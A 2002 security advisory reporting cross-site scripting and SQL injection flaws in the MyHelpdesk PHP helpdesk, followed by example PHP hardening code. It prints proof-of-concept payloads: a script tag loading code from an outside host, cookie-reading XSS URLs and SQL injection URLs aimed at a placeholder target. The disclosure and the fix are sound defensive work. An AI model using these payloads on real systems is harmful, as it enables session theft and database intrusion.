From: Ahmet Sabri ALPER (s_alperhotmail.com)
Date: Mon Jun 10 2002 - 06:50:47 CDT

    +/--------\-------- ALPER Research Labs ------/--------/+
    +/---------\------- Security Advisory -----/---------/+
    +/----------\------ ID: ARL02-A15 ----/----------/+
    +/-----------\----- salperolympos.org ---/-----------/+


    Advisory Information
    --------------------
    Name : Multiple Security Issues in MyHelpdesk
    Software Package : MyHelpdesk
    Vendor Homepage : http://myhelpdesk.sourceforge.net/
    Vulnerable Versions: v20020509 and older
    Platforms : OS Independent, PHP
    Vulnerability Type : Input Validation Error
    Vendor Contacted : 01/06/2002
    Vendor Replied : 02/06/2002
    Prior Problems : N/A
    Current Version : v20020509 (vulnerable)


    Summary
    -------
    MyHelpdesk is a PHP/MySQL Helpdesk system based on the
    OneOrZero Helpdesk but with a different set of features.
    The system is appropriate for the Support Desk of small
    organizations.

    Multiple Cross Site Scripting and SQL injection problems
    exist within "MyHelpdesk".


    Details
    -------
    1. When a support assistant creates a new ticket, the Title
    and Description input is not filtered for malicious code,
    so both fields allow Cross Site Scripting attacks. If the
    issue is exploited correctly, this may give any supporter
    the administrator's password.
    Proof-of-concept input for the Title and/or Description fields:
    <script src="http://forum.olympos.org/f.js">Alper</script>


    2. Maliciously crafted links from third party sites may allow
    Cross Site Scripting attacks. This can be accomplished via three
    different functions of index.php:
    http://[TARGET]/supporter/index.php?t=tickettime&id=<script>alert(document.cookie)</script>
    http://[TARGET]/supporter/index.php?t=ticketfiles&id=<script>alert(document.cookie)</script>
    http://[TARGET]/supporter/index.php?t=updateticketlog&id=<script>alert(document.cookie)</script>

    3. When any ticket is edited, the update section is likewise
    not filtered correctly and may carry malicious code.

    4. Three different functions of "index.php" pass user input
    directly into the SQL query. This makes it possible for
    attackers to launch SQL injection attacks.

    http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me
    http://[TARGET]/supporter/index.php?t=editticket&id=got%20root
    http://[TARGET]/supporter/index.php?t=updateticketlog&id=without%20me


    Solution
    --------
    The vendor stated in his reply that MyHelpDesk was
    designed for internal use for small organizations, and
    such issues would not do much harm for internal
    systems.

    Workaround:
    Filter the $id, $title and $description variables for
    malicious code.
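    As an added defender-side example (not MyHelpdesk's own code), this is one way to apply the workaround above to the supporter/index.php functions named in the advisory: $id is validated as a ticket number before it reaches SQL or HTML, the query is parameterised, and free-text fields are HTML-escaped on output. It assumes PHP 7.1+, a mysqli connection in $db and a "tickets" table with columns id, title and description; none of these names are taken from the product.

```php
<?php
// Added example, not MyHelpdesk code. Assumed: PHP 7.1+, $db is an open
// mysqli connection, table "tickets" has columns id, title, description.

// $id is only ever a ticket number, so reject anything else up front.
// This covers the detailticket/editticket/updateticketlog SQL injection
// and the reflected XSS in tickettime/ticketfiles/updateticketlog alike.
function ticket_id_from_request(array $get): ?int
{
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Free-text fields (title, description, update log) are stored as typed;
// every place that prints them escapes the value for HTML instead.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function fetch_ticket(mysqli $db, int $id): ?array
{
    // Prepared statement: $id is bound as an integer, never concatenated
    // into the query string, so "root me" style input cannot alter the SQL.
    $stmt = $db->prepare('SELECT id, title, description FROM tickets WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($tid, $title, $description);
    $row = $stmt->fetch()
        ? ['id' => $tid, 'title' => $title, 'description' => $description]
        : null;
    $stmt->close();
    return $row;
}

// Hardened "detailticket" handler.
$id = ticket_id_from_request($_GET);
if ($id === null) {
    http_response_code(400);
    exit('Invalid ticket id');
}
$ticket = fetch_ticket($db, $id);
if ($ticket === null) {
    http_response_code(404);
    exit('No such ticket');
}
// A stored title of <script src=...>Alper</script> is rendered as text here.
echo '<h1>Ticket #', $ticket['id'], ': ', h($ticket['title']), '</h1>';
echo '<pre>', h($ticket['description']), '</pre>';
```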


    Credits
    -------
    Discovered on 1 June 2002 by
    Ahmet Sabri ALPER <salperolympos.org>
    ALPER Research Labs.

    The ALPER Research Labs. [ARL] workers are freelance
    security professionals and WhiteHat hackers. The ARL
    workers are available for hire for legal jobs.
    The ARL also supports the Open Software Community by detecting
    possible security issues in GPL or other publicly licensed
    products.


    References
    ----------
    Product Web Page: http://myhelpdesk.sourceforge.net/
    Olympos: http://www.olympos.org/